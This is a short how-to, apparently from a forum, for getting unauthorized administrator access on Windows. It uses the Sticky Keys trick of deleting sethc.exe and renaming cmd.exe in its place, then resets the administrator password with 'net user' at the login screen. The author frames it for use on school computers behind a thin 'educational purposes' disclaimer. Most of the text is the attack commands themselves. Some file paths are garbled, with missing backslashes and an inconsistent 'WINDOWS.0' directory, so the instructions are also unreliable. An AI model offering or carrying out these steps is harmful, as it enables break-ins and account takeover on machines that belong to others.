This tutorial is for EDUCATIONAL PURPOSESonly. I take NO responsibility for your actions. I also do not recommend doing this at school, because more than likely, you will be caught.
Requirements:
- Notepad
- The User Name of the Administrator's Account
- Click on the start button.
- Click Run.
- Type "Notepad.exe" without quotes.
- Be sure to have All Files selected in the Save Dialogue's combobox.
- Be sure to have .bat at the end of the file name.
- Each line of code should be a separate command by pressing the Enter key after each line.
- After typing the last line of code shutdown -s -r -t 2 the computer should restart.
- An unprotected command prompt will now open.
- Replace ADMINHERE with the name of the administrator on said computer.
- Replace NEWPASSHERE with a password of your desire.
Step 1:
Open notepad.
Step 2:
Type the following into notepad:
Code:
command.com
Step 3:
Save the file as cmd.bat
Step 4:
Double-click on the newly created file cmd.bat and type the following codes:
Code:
mkdir c:WINDOWSsystem32temphack
copy c:WINDOWSsystem32sethc.exe c:WINDOWS.0system32temphack
copy c:WINDOWSsystem32cmd.exe c:WINDOWS.0system32temphack
erase c:WINDOWSsystem32sethc.exe
rename c:WINDOWSsystem32cmd.exe sethc.exe
shutdown -s -r -t 2
Step 5:
At the log-in screen, press the Shift key 5 times.
Step 6:
Type the following code into the command prompt:
Code:
net user ADMINHERE NEWPASSHERE
Step 7:
Log-in to the computer with the administrator account and enjoy!
How does this work?
This deletes the Sticky Keys dialogue box, the menu that pops up after you hold down ****, and replaces it with the command prompt. After you type the code in Step 4 and see the Log-in screen after restart, you will just open the command prompt instead of Sticky Keys. Then, you change the password to the existing administrator account, and log-in to it.
This can be changed around to open more than just the command prompt, so play around and be careful.